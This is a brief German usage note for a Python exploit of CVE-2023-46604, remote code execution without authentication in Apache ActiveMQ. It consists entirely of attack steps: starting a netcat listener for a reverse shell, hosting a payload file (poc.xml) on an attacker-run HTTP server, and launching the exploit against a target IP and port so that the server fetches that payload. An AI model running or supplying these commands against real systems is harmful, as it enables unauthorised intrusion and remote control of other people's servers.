
CVE-2023-46604-RCE-Exploit mit Linux-Reverse-Shell-Payload
Python-Implementierung der nicht authentifizierten Remote-Codeausführung in Apache ActiveMQ
nc -lvnp 4444 -> Listener starten
python3 -m http.server 8080 -> Hosten Sie poc.xml, das Ihren Payload enthält
python3 CVE-2023-46604-RCE.py -i <Target-IP> -p <Target-Port> -u http://<Your-IP>:8080/poc.xml -> Exploit starten